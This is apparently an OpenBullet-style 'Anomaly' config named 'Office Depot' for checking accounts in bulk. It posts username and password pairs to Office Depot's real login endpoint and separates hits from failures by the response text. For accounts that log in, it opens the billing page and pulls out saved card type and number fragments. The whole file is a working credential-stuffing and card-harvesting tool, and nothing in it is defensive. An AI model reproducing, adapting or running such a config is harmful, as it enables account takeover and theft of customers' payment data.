[SETTINGS]
{
  "Name": "Office Depot",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-02-20T20:01:13.5900795-05:00",
  "AdditionalInfo": "",
  "Author": "Cloud",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.officedepot.com/account/loginAccountSet.do" 
  CONTENT "loginName=<USER>&password=<PASS>&confirmationRequired=false&requestor=accountSummary&vendorConfigId=&vendorJumpTo=&loginDestination=&reqLevel=ACCOUNT" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "origin: https://www.officedepot.com" 
  HEADER "referer: https://www.officedepot.com/account/accountSummaryDisplay.do" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "isLoggedIn\":true" 
  KEYCHAIN Failure OR 
    KEY "Your login name or Password is incorrect" 

!PARSE "<COOKIES(JSESSIONID)>" LR "" "" -> VAR "ID" 

REQUEST GET "https://www.officedepot.com/account/v2/editBillingDisplay.do" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<span class=\"card_type_num short_desc\">" "</span>" -> VAR "" 

